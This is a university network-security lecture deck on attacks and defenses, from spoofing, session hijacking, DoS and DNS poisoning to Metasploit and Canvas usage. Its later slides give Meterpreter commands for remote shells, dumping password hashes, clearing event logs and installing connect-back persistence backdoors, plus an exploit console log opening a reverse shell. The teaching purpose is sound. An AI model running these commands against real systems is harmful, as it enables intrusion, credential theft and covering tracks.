Transcript Network Security - IIS Windows Server

Network Security
CPSC6128 – Lecture 3
Attacks, Vulnerabilities and Exploits
CPSC 6128 - Network Security
1
Network Attack Methodology
 Recon – Information
gathering
 Scanning – Enumeration
 Vulnerability Identification
•Post Exploitation
Maintaining Access
Removing Forensic
Evidence
Exfiltration
 Exploit




Gaining access
Elevating given access
Application/Web level attacks
Denial of Service (DOS)
CPSC 6128 - Network Security
2
GENERAL NETWORK ATTACK
TECHNIQUES
CPSC 6128 - Network Security
3
IP address spoofing (1)
SA: 36.220.9.59
DA: 212.68.212.7
212.68.212.7
145.13.145.67
 Attacker doesn’t want actions traced back
 Simply re-configure IP address in Windows or Unix.
 Or enter spoofed address in an application
 e.g., decoy packets with Nmap
CPSC 6128 - Network Security
4
IP address spoofing (2)
145.13.145.67
attacker
SA: 36.220.9.59
DA: 212.68.212.7
212.68.212.7
victim
36.220.9.59
SA: 212.68.212.7
DA: 36.220.9.59
 But attacker cannot interact with victim
 Unless attacker is on path between victim and spoofed address
CPSC 6128 - Network Security
5
IP spoofing with TCP?
 Can an attacker make a TCP connection to server
with a spoofed IP address?
 Not easy
 Sequence Numbers are negotiated between sender and
receiver to insure that packets are part of an established
connection
 If attacker can guess initial sequence number, can attempt
to inject into the conversation
 But TCP uses random initial sequence numbers
 Poor implementations of TCP, however
 can allow for the sequence #’s to be predictable
CPSC 6128 - Network Security
6
Defense: Egress/Ingress filtering
Egress Filtering
127.32.1.1
x
Internet
222.22/16
Ingress Filtering
127.32.1.1
x
Internet
222.22/16
CPSC 6128 - Network Security
7
Ingress Filtering: Upstream ISP (1)
12.12/24
regional
ISP
BGP update:
12.12/24,
34.34/24
34.34/24
tier-1 ISP
56.56/24
BGP update:
56.56/24,
78.78/24
regional
ISP
78.78/24
CPSC 6128 - Network Security
8
Ingress Filtering: Upstream ISP (2)
12.12/24
BGP update:
12.12/24,
34.34/24
Filter all traffic
but
12.12/24 and
34.34/24
34.34/24
56.56/24
BGP update:
56.56/24,
78.78/24
Filter all traffic
but
56.56/24 and
78.78/24
78.78/24
CPSC 6128 - Network Security
9
Ingress Filtering: Upstream ISP (3)
12.12/24
regional
ISP
56.56.1.1
x
Filter all but
12.12/24 and
34.34/24
34.34/24
tier-1 ISP
Filter all but
56.56/24 and
78.78/24
56.56/24
regional
ISP
78.78/24
CPSC 6128 - Network Security
10
Ingress Filtering: Upstream ISP (4)
12.12/24
34.34.1.1
Filter all but
12.12/24 and
34.34/24
regional
ISP
34.34/24
spoofed
packet gets
through!
tier-1 ISP
Filter all but
56.56/24 and
78.78/24
56.56/24
regional
ISP
78.78/24
CPSC 6128 - Network Security
11
Ingress/Egress filtering: Summary
 Effectiveness depends on widespread deployment at
access ISPs
 Deployment in upstream ISPs helps, but does not
eliminate IP spoofing
 Even if universally deployed at access, hacker can still
spoof another address in its access network 12.12/24
 See RFC 2827 “Network Ingress Filtering: Defeating
DDoS”
12
CPSC 6128 - Network Security
Attack
TCP Session Hijacking
 A technique used to gain access to Internet servers
 It was first used by Kevin Mitnick to gain access to
Tsutomu Shimomura's workstation in 1995
 Take control of one side of a TCP connection
 Marriage of sniffing and spoofing
Alice telnet
Bob
Alice
Attacker
CPSC 6128 - Network Security
13
TCP Session Hijacking: Limitation
2. to resync, Alice
sends segment with
correct seq #
Alice
Bob is getting segments
from attacker and Alice.
Source IP address same,
but seq #’s different.
Bob likely drops
connection.
1. weird ACK # for
data never sent
Bob
Attacker
Attacker’s solutions:
1) Overwrite IP-to-MAC ARP tables, then Alice’s segments
will not reach Bob and vice-versa
2) DOS attack Alice so her machine won’t see erroneous
replies from Bob
3) Older method was to use IP source routing to route packets
back to attacker
CPSC 6128 - Network Security
14
Session hijacking: The details
 Attacker and Alice are on the same network segment
 where traffic passes from Alice to Bob, as well as to the attacker
 Attacker can sniff the packets
 And See TCP packets between Bob and Alice and their sequence numbers
 Attacker jumps in, sending TCP packets to Bob
 source IP address = Alice’s IP address
 Bob now obeys commands sent by attacker, thinking they were sent by Alice
 Principal defense
 Encryption with authentication protocol
 Attacker does not have keys to decrypt and insert meaningful traffic
 How about Attacker and Alice are not on the same network Segment?
 Very complex, please read the handout –TCP Session Hijacking
 Tools used
 Juggernaut (Linux)
 Hunt (Unix based)
 T-Sight (Windows OS)
CPSC 6128 - Network Security
15
HTTP Session Hijacking:
HTTP Session ID: ADEF78DDC543DDDE
Client
Web Server
Attacker
 Involves obtaining the HTTP Session ID
 The ID can be found in cookies and URLs
 Called Sidejacking if sniffed
CPSC 6128 - Network Security
16
Firesheep – HTTP Sidejacking
---Not downloaded, but handout.
CPSC 6128 - Network Security
17
Denial-of-Service Attacks
Prevent access by legitimate users or stop
critical system processes
 Vulnerability attack
 Send a few crafted messages to target app that has vulnerability
 Malicious messages called the “exploit”
 Remotely stopping or crashing services
 Connection flooding
 Overwhelming connection queue with SYN flood
 Bandwidth flooding attack
 Overwhelming communications link with packets
 Strength in flooding attack lies in volume rather than content
CPSC 6128 - Network Security
18
DoS and DDoS
 DoS:
 source of attack small # of nodes
 source IP typically spoofed
 DDoS
 From thousands of nodes
 IP addresses often not spoofed
 Often implemented as a Botnet
CPSC 6128 - Network Security
19
Interlude: IP datagram format
32 bits
header length
(bytes)
“type” of data
max number
remaining hops
(decremented at
each router)
upper layer protocol
to deliver payload to
ver head. type of
len service
16-bit identifier
upper
time to
layer
live
length
fragment
flgs
offset
Internet
checksum
total datagram
length (bytes)
for
fragmentation/
reassembly
32 bit source IP address
32 bit destination IP address
Options (if any)
data
(variable length,
typically a TCP
or UDP segment)
CPSC 6128 - Network Security
20
IP Fragmentation and Reassembly
Example
 4000 byte datagram
 MTU = 1500 bytes
length ID fragflag offset
=4000 =x
=0
=0
One large datagram becomes
several smaller datagrams
length ID fragflag offset
=1500 =x
=1
=0
1480 bytes in
data field
length ID fragflag offset
=1500 =x
=1
=185
offset =
1480/8
length ID fragflag offset
=1040 =x
=0
=370
CPSC 6128 - Network Security
21
DoS: examples of vulnerability
attacks
Land:

sends spoofed packet with source and dest
address/port the same
Ping of death:

Teardrop, Newtear, Bonk,
Syndrop:

tools send overlapping segments, that is,
fragment offsets incorrect.
sends oversized ping packet
Jolt2:

sends a stream of fragments, none of which
have fragflag set to 0. Rebuilding consumes
all processor capacity.
Patches fix the problem,
but malformed packet
attacks continue to be
discovered.
CPSC 6128 - Network Security
22
Connection flooding: Overwhelming
connection queue w/ SYN flood
 Send SYN packet
 Attack
 Recall client sends SYN packet with initial
seq. number when initiating a connection.
 Allocate Memory
 TCP on server machine allocates memory
on its connection queue, to track the status
of the new half-open connection.
 Send many SYN packets
 Fill up connection queue with half-open
connections
 Can spoof source IP address
 When connection queue is exhausted

no new connections can be initiated by legit users.
 Wait for ACK
 For each half-open connection, server waits
for ACK segment, using a timeout that is
often > 1 minute
CPSC 6128 - Network Security
23
DoS: Overwhelming connection queue
with SYN flood
Amateur attack:
attacker
Connection queue
freed up with
RST segment
victim
Alice
Expert attack:
 Use multiple source IP Addresses
 Each from unresponsive addresses
CPSC 6128 - Network Security
24
SYN flood defense: SYN cookies (1)
SYN with ISNA
Client
SYN-ACK with ISNB= cookie
Web Server
 When SYN segment arrives, server calculates function
(hash) based on:
 Source and destination IP addresses and port numbers, MSS (Max Segment
Size) and a slowly incrementing timestamp
 Hash Output 32 bits
 Server uses resulting “cookie” for its initial seq # (ISN) in
SYNACK
 Server does not allocate anything to half-open connection:
 Does not remember client’s ISN
 Does not remember cookie
CPSC 6128 - Network Security
25
SYN flood defense: SYN cookies (2)
 If SYN is legitimate
 Client returns final ACK w/
Seq# = ISN(of server)+1
 Server computes same
function, verifies function =
SEQ # in ACK segment
 If SYN-flood attack with
spoofed IP address
 No ACK comes back to server
for connection.
 No problem

server is not waiting for an ACK and has
no resources allocated
 Legit connection established
without the need for halfopen connections
CPSC 6128 - Network Security
26
Another Attack: Overwhelming link
bandwidth with packets
 Attack traffic can be made similar to legitimate traffic,
hindering detection.
 Flow of traffic must consume target’s bandwidth
resources
 Attacker needs to engage more than one machine => DDoS
 May be easier to get target to fill-up its upstream
bandwidth: async access
CPSC 6128 - Network Security
27
Example: Distributed DoS
Attacker takes over many machines,
called “bots”. Potential bots are
machines with vulnerabilities.
bot
bot
attacker
Internet
victim
bot
bot processes wait
for command from
attacker to flood a target
bot
CPSC 6128 - Network Security
28
Example: LOIC (try it)
CPSC 6128 - Network Security
29
DDoS using DNS Server
----Amplification Attack
DNS server
reply
request
request
reply
DNS server
request
attacker
reply
victim
DNS server
request
reply
Source IP = Victim’s IP
DNS server
CPSC 6128 - Network Security
30
DDoS: Amplification Attack
 Spoof source IP address = victim’s IP
 Goal:
 generate lengthy or numerous replies for short requests:
Amplification
 Amplification Attack
 can also be done with Web and other services
CPSC 6128 - Network Security
31
DDoS Defenses
 Don’t let your systems become
bots
 Keep systems patched up
 Employ egress anti-spoof filtering
on external router
 Filter dangerous packets
 Signature and anomaly
detection and filtering
 Rate limiting
 Limit # of packets sent
from source to dest
 To avoid vulnerability attacks
 Using Intrusion prevention systems
 Over-provisioning of resources




Abundant bandwidth
Large pool of servers
ISP needs abundant bandwidth too
Multiple ISPs
CPSC 6128 - Network Security
32
DNS attacks
 Reflector attack
 Leverage DNS for attacks on arbitrary targets - DDOS
 Denying DNS service
 Stop DNS root servers
 Stop top-level-domain servers (e.g. .com domain)
 Stop local (default name servers)
 Use fake DNS replies to redirect user
 Poisoning DNS
 Insert false resource records into various DNS caches
 False records contain IP addresses operated by attackers
33
CPSC 6128 - Network Security
DDOS DNS Attack Against Root Servers
Example
 Oct 21, 2002
 Ping packets sent from bots to the 13 DNS root servers
 Goal: bandwidth flood servers
 Minimize impact:
 DNS caching
 Rate limiting at upstream routers: filter ping when they arrive at an excessive rate
 Root server attack is easy to defend
 Download root server database to local (default) name servers
 Not much data in root server; changes infrequently
 Similar kind of attack attempted in March 2012
34
CPSC 6128 - Network Security
DNS attack: redirecting
hub or
WiFi
1
network
client
local DNS
server
2
attacker
1.
2.
Issues:
 Must spoof IP address
 Set to local DNS server (easy)
Client sends DNS query to its local
DNS server; sniffed by attacker
 Must match reply ID with request ID
Attacker responds with bogus
 Easy
DNS reply
 May need to stop reply from the local DNS server
 harder
CPSC 6128 - Network Security
35
Poisoning DNS Cache
 Poisoning
 Attempt to put bogus records into DNS name server caches
 Bogus records could point to attacker nodes
 Attacker nodes could phish
 But unsolicited replies are not accepted at a name server
Name servers use IDs in DNS messages to match replies to
queries
So can’t just insert a record into a name server by sending a DNS
reply message.
 But can send a reply to a request.
CPSC 6128 - Network Security
36
Poisoning local DNS server
authoritative
DNS for csu.edu
Client Connecting
Remotely to CSU
2. iterative
DNS queries
1. DNS query
www.csu.edu=
?
3. DNS reply
www.csu.edu=
17.32.8.9
Attacker
17.32.8.9
csu = ColumbusState
Local ISP DNS
Server for Client
Goal: Put bogus IP address for poly.edu
in local Berkeley DNS server
1) Attacker queries local DNS server
2) Local DNS makes iterative queries
3) Attacker waits for some time;
sends a bogus reply, spoofing
authoritative server for csu.edu.
CPSC 6128 - Network Security
37
Poisoning local DNS server (cont)
Client Connecting
Remotely to CSU
authoritative
DNS for csu.edu
1. DNS query
www.csu.edu=?
2. DNS response
www.csu.edu=17.32.8.9
3. http
connection to
17.32.8.9
Attacker
17.32.8.9
Local ISP DNS
Server for Client
DNS response can provide IP
address of malicious server!
CPSC 6128 - Network Security
38
DNS Poisoning (cont)
 Issues:
 Attacker needs to know sequence number in request
message sent to upstream server
Not easy!
 Attacker may need to stop upstream name server from
responding
So that server under attack doesn’t get suspicious
Ping of death, DoS, overflows, etc
CPSC 6128 - Network Security
39
DNS attacks: Summary
 DNS
 a critical component of the Internet infrastructure
 But is surprisingly robust
DDoS attacks against root servers have been largely unsuccessful
Poisoning and redirecting attacks are difficult unless you can sniff DNS requests
And even so, may need to stop DNS servers from replying
 DNS can be leveraged for reflection attacks against
non-DNS nodes
CPSC 6128 - Network Security
40
TOOLS AND ATTACK IMPLEMENTATION
CPSC 6128 - Network Security
41
Vulnerability Scanners
 Vulnerability
 a software bug or mis-configuration allowing for unauthorized access
 Original vulnerability scanner




It was called SATAN (Security Admin Tool for Analyzing Networks)
Written by Dan Farmer in 1995 employed by SGI at the time
Very controversial when released
It eventually resulted in SGI firing Dan Farmer
 Commercial scanners (currently)




ISS Internet Scanner
SAINT
Retina by eEye
Nessus by Tenable
CPSC 6128 - Network Security
42
Nessus
 Nessus project started by Renaud Deraison in 1998
 Very popular vulnerability scanner
 Oct 2005 founded Tenable security and changed to “closed source”
 Still free but with limited signature set
 OPEN-VAS is a fork of the original Nessus code
 and is still open source at http://www.openvas.org
CPSC 6128 - Network Security
43
Nessus Architecture
CPSC 6128 - Network Security
44
Nessus Plugin Selection
CPSC 6128 - Network Security
45
Nessus Scan Results
CPSC 6128 - Network Security
46
Web Vulnerability Scanners
 Nikto





Most popular
Looks for default files and configs and well as server misconfiguration
Provides versioning information
Runs on Linux or Windows
http://www.cirt.net
CPSC 6128 - Network Security
47
Nikto
CPSC 6128 - Network Security
48
Exploits Bought and Sold
CPSC 6128 - Network Security
Exploitation Tools
 Immunity Canvas
 Commercial
 http://www.immunitysec.com
 Core Impact
 Commercial
 http://www.coresecurity.com
 Metasploit
 Open Source: http://www.metasploit.org
 recently acquired by Rapid7
CPSC 6128 - Network Security
50
Immunity Canvas
 Runs on Windows, OS X or Linux (Linux
recommended)
 Currently over 370 exploits with an average
of 4 exploits added each month
 Flexible payload options
 Connect to sock or “call back”
 MOSDEF session allows for arbitrary code execution
 Can get screenshots, video, keylogging, etc.
CPSC 6128 - Network Security
51
Canvas Interface
CPSC 6128 - Network Security
52
Canvas Interface
Red – Modules – Things that Canvas can do
Purple – Things that Canvas know about
Yellow – Status Window, what Canvas is currently doing
CPSC 6128 - Network Security
53
Canvas
Set Target
CPSC 6128 - Network Security
54
Canvas – Port Scan
 Canvas has reconnaissance tools and vulnerability assessment tools built in
 These can be supplemented by imports from other tools such as Nessus
 Here we can see that the scan reveals the usual Windows ports open
CPSC 6128 - Network Security
55
Canvas – Exploits
Lets try a SMB exploit
CPSC 6128 - Network Security
56
Canvas – Launch Exploit
CPSC 6128 - Network Security
57
Canvas – Success We Have Shell!
CPSC 6128 - Network Security
58
The Metasploit Framework
 Open Source Development Framework for











Penetration testing
Patch verification
Regression testing
Security Research
Runs on Linux, Mac OS X, BSD, Windows
Remote and local exploits
Browser exploits
Ability to create exploits
Developed by HD Moore
Recently “acquired” by Rapid7
All indications are that it will remain open source
CPSC 6128 - Network Security
59
Terms
 Vulnerability
 weakness in a system which allows an attacker to reduce the
systems security posture
 Exploit
 Code which allows an attacker to take advantage of the
vulnerability in the system
 Payload
 The code which is delivered by the exploit
 This is the code which actually runs on the victim system
 Post exploitation
 Encoders
 Way to obfuscate the payload code so that anti-virus and IDS
won’t detect
 Module
 A small piece of code to that can be added to the Metasploit
Framework to execute an attack
 Auxiliary Module
 other parts of Metasploit that aid in exploitation such as scanners
CPSC 6128 - Network Security
Why Metasploit Framework?
 Individual exploit code hard to manage, update and
customize
 No code reuse
 With a framework there is no need to customize exploits
to match payload code
 Mix and match exploits and payloads easily
 Rapid development of new exploit code
CPSC 6128 - Network Security
Architecture Overview
Diagram by HDMoore/MSF
Libraries
Custom Plugins
Protocol Tools
REX
Framework:Core
Framework:Base
Interfaces
msfweb
msfcli
msfconsole
msfgui
msfapi
Modules
Interfaces
Security
Tools
WebInterfaces
Services
Interfaces
Integration
CPSC 6128 - Network Security
exploits
payloads
encoders
nops
auxiliary
62
Different types of Payload
 Inline
 A single payload containing the exploit and full shellcode for the selected task
 Inline payloads are by design more stable than their counterparts because they contain everything all in one
 However, some exploits won’t support the resulting size of these payloads
 Staged
 Many exploitable situations constrain how many bytes an attacker may load into one contiguous location in
memory
 One way to do interesting post exploitation in these situations is to deliver the payload in stages
 Reverse
 Instead of the attacker connecting to the payload on the exploited host
 The payload on the exploited host connects back to the attacker
 Good for inside firewalls.
 NoNx
 The NX (No eXecute) bit is a feature built into some CPUs to prevent code from executing in certain areas of
memory.
 In Windows, NX is implemented as Data Execution Prevention (DEP)
 The Metasploit NoNX payloads are designed to circumvent DEP
 PassiveX
 A payload that can help in circumventing restrictive outbound firewalls
 It does this by using an ActiveX control to create a hidden instance of Internet Explorer
 Using the new ActiveX control, it communicates with the attacker via HTTP requests and responses
CPSC 6128 - Network Security
More About Payloads (cont)
 IPv6
 IPv6 payload
 designed to work over IPv6
 Meterpreter





Short for Meta-Interpreter
an advanced, multi-faceted payload that operates via DLL injection
resides completely in the memory of the remote host
leaves no traces on the hard drive
making it very difficult to detect with conventional forensic techniques
CPSC 6128 - Network Security
Meterpreter







Meta-Interpreter
Advanced payload which operates via DLL injection
Resides completely in memory
No hard disk writes at all
Scripts and plugins supported
Well supported and constant development
Encrypted communications between the attacker and payload





Remote command execution
In-memory process migration
Registry modifications
Pivoting
File system support and more
CPSC 6128 - Network Security
How it Works
Exploit + 1st Stage Payload
Payload Connects back to MSF
2nd Stage DLL Injection Payload Sent
MSF Sends Meterpreter Server DLL
Client and Server Communicate
CPSC 6128 - Network Security
66
Metasploit Interfaces
MSFGUI
MSFd
MSFWeb
MSFConsole
CPSC 6128 - Network Security
MSFCLI
Armitage
MsfConsole
CPSC 6128 - Network Security
68
MsfConsole Basics




Interactive console for Metasploit
Tab completion (double tap) to help type
Can execute external commands
Most flexible interface
CPSC 6128 - Network Security
69
Directory Structure
 Modules
 What we will mainly be working with
 Contain Exploits, auxiliary, encoders
 Scripts
 extension scripts
 Typically from 3rd parties.
 “run checkvm”, “run getcountermeasure”, “run getgui” (Meterpreter scripts)
 Plugins
 location for your own exploits development
 External
 interfaces to external services such a serial port
 Data
 data source for exploits
 dictionaries, wordlists, sql, snmp mibs, etc.
CPSC 6128 - Network Security
70
Modules
 Auxiliary
 tasks outside of direct exploitation such as port scanning, sniffing, etc
 Encoders
 various techniques for obfuscating payloads to avoid antivirus and IDS
 Exploits
 organized by OS
 Ruby scripts containing the exploit code
 Nops
 nop sleds for various CPU architecture
 Post
 post exploitation scripts for data gather, exfiltration
 Payloads
 3 types (singles, stagers, stages)
 OS specific
CPSC 6128 - Network Security
71
Exploitation Basics-search exploits
 Identify vulnerability
 based on recon and possible output from vulnerability scanner (Nessus)
 Choose exploit
 which can take advantage of that vulnerability
 Use “search”
 example using MS08-067
 Play techno music in background 
CPSC 6128 - Network Security
Exploitation Basics—use exploits
 “use” command followed by directory path
 “use exploit/windows/smb/ms08_067_netapi”
 Use tab completion
 double tap
 Display options required for exploit “show options”
CPSC 6128 - Network Security
Exploitation Basics—Set PAYLoad
 Select PAYLOAD
 to deliver after successful exploitation
 Can use tab completion to show options
 “set PAYLOAD windows/meterpreter/bind_tcp”
 bind_tcp will listen for attacker to connect
 Reverse payload will connect back to the attacker
CPSC 6128 - Network Security
Exploitation Basics—Set RHOST
 “show options” now shows PAYLOAD options
 “set” command will set the options
 “set RHOST 172.16.156.132
CPSC 6128 - Network Security
Exploitation Basics –Finally, exploit
 “exploit” to run exploit
 Will open a session to target with prompt “meterpreter>”
 “background” will send session to the background
 “session –i 1” will return to the first session
 “execute –f cmd.exe –i –H” will have remote shell
CPSC 6128 - Network Security
Now What? - Post Exploitation
 Meterpreter Basics
 Migrate
 migrates the meterpreter DLL injection to a different process
 Explorer.exe is a good choice
 Sysinfo
 displays information about the target system
 Download
 “download c:\\boot.ini” - downloads from the target machine
 Note double slashes
 Upload
 “upload c:\\boot.ini c:\\windows\system32”, or “upload c:\\boot.ini yang”
 uploads file to the target machine
 Getuid
 returns the userid (permissions) that meterpreter is running
 Execute
 “execute –f cmd.exe –i –H” runs command on the remote machine
 “–i” runs the command interactively
 “-H’ hides the process from user
 hashdump
 dumps the SAM database for offline cracking
 Clearev
 clears the windows events logs
 MUCH MORE
 See: http://www.offensive-security.com/metasploit-unleashed/
CPSC 6128 - Network Security
Pivoting
 Using one compromised machine to further exploit
other hosts or networks
 Example would be a client side “drive by browser”
attack
 Once the attacker owns this machine inside the firewall
 they can launch all further attacks from this compromised machine
Attacker
Compromised
Machine
CPSC 6128 - Network Security
Target Machine
Add Route to an exist session
 Add route from attacker machine to remote network
 “route add 10.100.100.0 255.255.255.0 1”
 adds a route to the remote network through meterpreter session 1
 Further attacks to 10.100.100.0 will traverse this session and the already exploited host
CPSC 6128 - Network Security
Persistence
 If remote target reboots
 meterpreter session is lost
 Might be ok if exploit is reliable
 Just run again
 However, this is usually not the case
 Two ways to perform persistence with Meterpreter
•
•
Persistence script
Metsvc
•
•
Set up a backdoor at the remote machine use “run metsvc –A”
Remove backdoor use “run metsvc –r”
CPSC 6128 - Network Security
Persistence Script
 Creates persistent backdoor
 which can be configured to connect back to attacker on system boot
 Creates a vbs file and registry key
 Can be uninstalled remotely
 “run persistence –A –L c:\\windows\system32 –X –i
10 –p 443 –r 192.168.1.10”
CPSC 6128 - Network Security
Metsvc backdoor
 Backdoor runs as a service on the target
 Attacker can connect to it remotely
 Less noisy compared to persistence script
CPSC 6128 - Network Security
“3rd Party” Rootkits




Used for more advanced post exploitation
Hiding process, files, data exfil.
http://www.rootkit.com
HackerDefender




written by Holy Father
Kernel mode rootkit
Holy Father offered custom builds of HD to bypass AV/IDS
Well understood – so we may use this in lab
CPSC 6128 - Network Security
Client Side Exploits
 Network side exploits are becoming more and more rare
 Attackers have moved to “client side” exploits
 Client-side exploits leverage software/applications
running on the target system
 Browser based attacks are common
 Java also significant attack vector
CPSC 6128 - Network Security
Example Client Side Exploit
CPSC 6128 - Network Security
85
Example Client Side Exploit
msf> exploit(apple_itunes_playlist) > exploit
[*] Started reverse handler
[*] Using URL: http://10.10.11.10:8080/mycoolplaylist.pls
[*] Server started.
[*] Exploit running as background job.
msf> exploit(apple_itunes_playlist) >
[*] Sending stage (474 bytes)
[*] Command shell session 1 opened (10.10.21.10:65535 ->
192.168.113.10:1075)
msf> exploit(apple_itunes_playlist) > sessions -i 1
[*] Starting interaction with 1...
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\System32\>
CPSC 6128 - Network Security
86
Armitage
CPSC 6128 - Network Security
87
 Type “armitage” from Backtrack
 Defaults ok
 Will start Metasploit and auto connect. Click YES when prompted
to start Metasploit
CPSC 6128 - Network Security
88
Scanning
 Nmap built in
 MSF scans are Metasploit built in scanning modules. Generally
Nmap is better
 All found targets are automatically added to the target window
CPSC 6128 - Network Security
89
Exploitation
 Apply “Find Attack” either by Port or by Vulnerability first
 Right click target will bring up possible exploits
 Can also specify exploits and modules from the right hand menu
CPSC 6128 - Network Security
90
Exploitation
 When host is compromised it appears RED with Lighting
 Select “Interact”, then Command Shell access
CPSC 6128 - Network Security
91
 Next Time
 Covering your tracks….
CPSC 6128 - Network Security
92